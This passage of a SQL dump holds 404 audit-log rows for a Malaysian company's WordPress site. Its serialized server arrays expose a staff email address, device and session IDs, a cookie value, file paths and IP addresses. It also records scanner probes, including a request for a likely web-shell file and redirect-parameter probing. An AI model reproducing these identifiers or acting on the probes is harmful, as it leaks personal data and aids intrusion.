9khhypZvX7@gJ12mPvNAAAAJI\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.28.38.21\";s:11:\"REMOTE_PORT\";s:5:\"52552\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/mini.php\";s:10:\"SCRIPT_URL\";s:9:\"/mini.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ9khhypZvX7@gJ12mPvNAAAAJI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570727047.5409\";s:12:\"REQUEST_TIME\";s:10:\"1570727047\";}}','notice','2019-10-10 17:04:09','2019-10-10 17:04:08',35045064,36849752,'https://bintara.com.my/mini.php',1,0,'103.28.38.21'),(27880,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:175:\"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3450.0 Iron Safari/537.36 Puffin/7.5.3.392 Edge/12.0 Iridium/50.2 AppleWebKit/537.36 Chrome/62\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"217.170.192.245\";s:11:\"REMOTE_PORT\";s:5:\"64508\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ@JX1s2haWVU9xVBy153AAAAdU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570736479.7715\";s:12:\"REQUEST_TIME\";s:10:\"1570736479\";}}','notice','2019-10-10 19:41:21','2019-10-10 19:41:20',35022712,36830440,'https://bintara.com.my/?page_id=18',1,0,'217.170.192.245'),(27881,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:122:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk%2Fbespoke-mirrors%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 UBrowser/6.2.4091.2 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:120:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk%2Fbespoke-mirrors%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"49263\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ@fxgKNH2yIeM@cFqwVuQAAAA8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570742214.5206\";s:12:\"REQUEST_TIME\";s:10:\"1570742214\";}}','notice','2019-10-10 21:16:56','2019-10-10 21:16:54',35030992,36842568,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fglassdesign.uk%2Fbespoke-mirrors%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'137.74.4.69'),(27882,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:108:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 UBrowser/6.2.4091.2 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:106:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"49696\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ@fzFs2haWVU9xVBy2D2AAAAcY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570742220.8685\";s:12:\"REQUEST_TIME\";s:10:\"1570742220\";}}','notice','2019-10-10 21:17:03','2019-10-10 21:17:01',35029624,36838552,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'137.74.4.69'),(27883,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:152:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.26 Safari/537.36 Core/1.63.5478.400 QQBrowser/10.1.1550.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"91.98.146.60\";s:11:\"REMOTE_PORT\";s:5:\"49527\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ-PBEdNB4K79x2TJls7kwAAAI4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570754309.0698\";s:12:\"REQUEST_TIME\";s:10:\"1570754309\";}}','notice','2019-10-11 00:38:30','2019-10-11 00:38:29',35029640,36835872,'https://bintara.com.my/?page_id=18',1,0,'91.98.146.60'),(27884,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{9ACE9F11-4E30-4BB4-8AF2-4157B508CC6D}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.6 (Build 18G103))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=860B8C25-1C0F-4BE4-9ED3-FC0A5B28C542\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ-StVs2haWVU9xVBy2c4wAAAcY\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:11:\"1.32.27.119\";s:11:\"REMOTE_PORT\";s:5:\"49566\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ-StVs2haWVU9xVBy2c4wAAAcY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570755254.5876\";s:12:\"REQUEST_TIME\";s:10:\"1570755254\";}}','notice','2019-10-11 00:54:18','2019-10-11 00:54:15',35730872,37525992,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'1.32.27.119'),(27885,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{125DE308-133D-4CF1-9A1A-B96F645B1110}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=ec912d500414cd5d8fd42a64f4fb80e3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.6 (Build 18G103))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=860B8C25-1C0F-4BE4-9ED3-FC0A5B28C542\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ-Su1s2haWVU9xVBy2c5QAAAcw\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:11:\"1.32.27.119\";s:11:\"REMOTE_PORT\";s:5:\"49566\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ-Su1s2haWVU9xVBy2c5QAAAcw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570755259.8494\";s:12:\"REQUEST_TIME\";s:10:\"1570755259\";}}','notice','2019-10-11 00:54:21','2019-10-11 00:54:20',35339480,37140920,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'1.32.27.119'),(27886,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{362B1D60-C79A-4B68-BD52-FCFDA5A900AE}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=ec912d500414cd5d8fd42a64f4fb80e3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.6 (Build 18G103))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=860B8C25-1C0F-4BE4-9ED3-FC0A5B28C542\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ-Svls2haWVU9xVBy2c5gAAAcs\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:11:\"1.32.27.119\";s:11:\"REMOTE_PORT\";s:5:\"49566\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ-Svls2haWVU9xVBy2c5gAAAcs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570755262.9023\";s:12:\"REQUEST_TIME\";s:10:\"1570755262\";}}','notice','2019-10-11 00:54:25','2019-10-11 00:54:23',35340536,37138504,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'1.32.27.119'),(27887,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"3B940C8E-5E5C-4F51-B455-90C05C5EEDA4\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ-Xn0dNB4K79x2TJls@xwAAAJI\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:11:\"1.32.27.119\";s:11:\"REMOTE_PORT\";s:5:\"52422\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_L